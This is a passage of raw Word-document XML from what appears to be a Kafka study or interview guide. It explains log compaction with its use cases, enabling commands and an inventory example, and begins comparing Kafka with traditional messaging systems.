          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514C8AF1" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140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will retain only the most recent message for each key, based on the latest value for that key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B2B14" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140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hen compaction runs, Kafka checks all records in a log segment and keeps the latest record for each key. Older versions of the same key are removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1030447B" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140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f a message with a null value (tombstone record) is sent for a key, Kafka will eventually remove all previous records with that key during the compaction process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BFEE97" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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How Kafka Log Compaction Helps Manage Log Size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C30D5E9" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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Efficient Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B0C91" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140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By keeping only the latest record for each key and discarding older versions, Kafka minimizes disk usage. This is particularly useful when you have high-throughput systems where records for the same entity are frequently updated but only the most recent state is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396E12B8" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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tate Maintenance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED0FE8D" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140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For systems that rely on maintaining the state of entities (such as users, devices, or products), Kafka log compaction helps reduce the amount of data that needs to be stored while ensuring that only the latest state is preserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C23BAB" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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erformance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3077DDCC" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140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As log compaction removes old versions of records, the size of Kafka logs decreases, reducing the amount of data that consumers need to process and improving overall system performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0184AA50" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140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Optimized for Event-Driven Architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59867250" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="140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n event-driven architectures, Kafka is often used to store a series of events representing updates to an entity. Log compaction ensures that only the final state of each entity is retained, helping to optimize storage while still allowing consumers to retrieve the latest state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC4A32" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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Use Cases for Log Compaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F172B05" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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Event Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DA23E6" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141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In event-driven architectures or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, events represent changes to an entity’s state over time. For instance, consider a system that tracks the state of a user profile. Instead of storing each individual event (like name changes, address updates, etc.), you can compact the log and store only the latest state of the user profile. This prevents the storage of redundant events while retaining the final state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A01A87" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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tateful Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E267D23" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141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lastRenderedPageBreak/>
        <w:t>Stateful applications</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that need to maintain the current state of an entity can use Kafka log compaction. For example, if you are storing configurations for IoT devices or users in Kafka, you only need to keep the latest configuration for each device or user. Log compaction ensures that only the most up-to-date configurations are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259BAE96" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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ache Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60858888" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141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n systems that use Kafka as a distributed cache, you can store the most recent cache value for each key. If the cache value changes, Kafka's log compaction feature ensures that only the latest value for each cache key is retained. This prevents the accumulation of outdated cache entries and optimizes storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD3B3A7" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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ata Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9FFD3D" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141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n scenarios where Kafka is used to synchronize data between multiple systems, log compaction ensures that only the latest value for a key is stored and propagated. This is beneficial when syncing stateful data, such as customer records or product information, across distributed services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC2D278" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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Tracking System States</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7611201B" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141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For applications that need to track the current state of entities, such as in financial systems (e.g., keeping the most recent balance of a user's account) or inventory systems (e.g., maintaining the latest quantity of an item), Kafka log compaction ensures that only the latest state is retained, preventing data bloat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0995D6" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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How to Enable Log Compaction in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC5E71E" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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o enable log compaction for a Kafka topic, you need to set the topic’s cleanup.policy to compact. Here’s how you can create a topic with log compaction enabled:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F404277" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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topics.sh --create --topic &lt;topic-name&gt; --partitions 3 --replication-factor 1 --config cleanup.policy=compact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F429D88" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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f the topic already exists, you can alter its configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A23D20" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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topics.sh --alter --topic &lt;topic-name&gt; --config cleanup.policy=compact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400FE2D8" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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Log Compaction Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7E59BA" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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og Segments</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka writes data into log segments. When a segment reaches a certain size, it is closed, and a new segment is started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56450591" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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mpaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka periodically runs a background process to compact log segments. During this process, older versions of records for a specific key are discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F37314" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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tention of Compacted Records</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once log compaction is completed, only the latest value for each key remains in the compacted log. In the case of a tombstone (null value), all records for that key are removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06929339" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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Compaction vs. Deletion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402693BA" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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eletion</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka allows data to be deleted after a certain period or once the partition reaches a specific size using the retention policy. This can remove records regardless of their key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE0BE2" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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mpaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Log compaction, however, only removes the older versions of a record for the same key, preserving the most recent value. Compaction is key-based, and you always retain the last state for each key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A9141" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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Example Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21432E47" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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et’s say we are managing an inventory system for a store, and we want to keep track of the latest stock level of each product. Kafka log compaction can be used to ensure that only the most recent stock level for each product is kept.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29530E18" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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nitially, product1 -&gt; {quantity: 100}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72508050" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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ater, product1 -&gt; {quantity: 90}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155775DA" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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en, product1 -&gt; {quantity: 80}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5750D82D" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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After compaction, only the latest record product1 -&gt; {quantity: 80} will remain, and the previous updates will be discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53822817" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348C9DB" w14:textId="77777777" w:rsidR="004D22EF" w:rsidRPr="0003272F" w:rsidRDefault="004D22EF"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s log compaction feature helps efficiently manage log sizes and maintain the latest state for entities, particularly in systems where only the most recent version of a record is relevant. By enabling log compaction, Kafka can store large amounts of stateful data with minimal storage requirements, making it ideal for event sourcing, stateful applications, and scenarios requiring the most recent data for each key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D82B47" w14:textId="0AC3BB1C" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004D22EF">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C88E917">
          <v:rect id="_x0000_i3167" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E01416D" w14:textId="305AFB2C" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB1CF5" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="791" w:name="_Toc196308271"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Compare Kafka with traditional messaging systems in terms of architecture, message durability, scalability, and performance</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="791"/>
    </w:p>
    <w:p w14:paraId="51DF860D" w14:textId="77494855" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 vs. Traditional Messaging Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07267120" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Apache Kafka has become a popular choice for messaging and streaming applications due to its unique architecture and performance features. Below is a comparison between Kafka and traditional messaging systems (like JMS, RabbitMQ, ActiveMQ) in terms of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>architecture</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message durability</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scalability</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performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE8847" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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1. Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564EF9B6" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECEA6DE" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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istributed and Decentralized</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka is designed to be horizontally scalable and fault-tolerant. It operates in a distributed manner where multiple brokers work together in a Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E44DC4" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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roker-Client Model</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers manage topics, partitions, and message storage. Producers send messages to topics, while consumers subscribe to topics to process the messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79883E1A" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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Topic and Partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka organizes messages into topics, and each topic can have multiple partitions. These partitions allow Kafka to scale horizontally, distributing data across different servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC36CD8" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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plication</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka provides replication within a cluster, ensuring fault tolerance. Each partition can have replicas distributed across multiple brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36338EFC" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31"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Traditional Messaging Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73011E67" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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entralized or Simple Broker Model</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditional messaging systems often rely on a centralized server or broker. For example, JMS (Java Message Service) systems like ActiveMQ and RabbitMQ often rely on a single broker or a few broker nodes with limited fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF852DA" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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Queue-Topic Model</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditional systems typically use either queues (for point-to-point messaging) or topics (for pub/sub messaging), but scaling them can be more complex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F2B5F" w14:textId="77777777" w:rsidR="00A17F31" w:rsidRPr="0003272F" w:rsidRDefault="00A17F31" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141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imited Partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
